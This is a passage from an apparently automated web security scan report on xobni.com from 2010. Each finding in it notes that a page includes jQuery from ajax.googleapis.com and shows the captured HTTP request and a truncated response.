Content-Type: text/html;charset=UTF-8
Content-Length: 9823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.23. http://www.xobni.com/download/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.24. http://www.xobni.com/download/12341 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/12341

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.25. http://www.xobni.com/download/latest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/latest

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.26. http://www.xobni.com/email-analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/email-analytics

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /email-analytics HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11220

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Analytics F
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.27. http://www.xobni.com/enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/products
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.4.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 11417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.28. http://www.xobni.com/enterprise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.29. http://www.xobni.com/enterprise/case_studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/case_studies

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/case_studies HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.30. http://www.xobni.com/enterprise/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/contact

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.31. http://www.xobni.com/enterprise/mobile_professionals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/mobile_professionals

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/mobile_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.32. http://www.xobni.com/enterprise/sales_professionals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sales_professionals

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/sales_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.33. http://www.xobni.com/enterprise/salesforce_extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/salesforce_extension

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/salesforce_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.34. http://www.xobni.com/enterprise/sharepoint_extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sharepoint_extension

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/sharepoint_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.35. http://www.xobni.com/enterprise/sign_up previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sign_up

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.36. http://www.xobni.com/enterprise/solutions_providers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/solutions_providers

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise/solutions_providers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.37. http://www.xobni.com/errors/401.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/401.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/401.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7653

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Error 401 Unautho
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.38. http://www.xobni.com/errors/403.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/403.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/403.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Error 403 Forbidd
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.39. http://www.xobni.com/errors/404.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/404.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/404.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.40. http://www.xobni.com/errors/500.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/500.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/500.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Server Error</TIT
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.41. http://www.xobni.com/errors/general.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/general.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/general.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
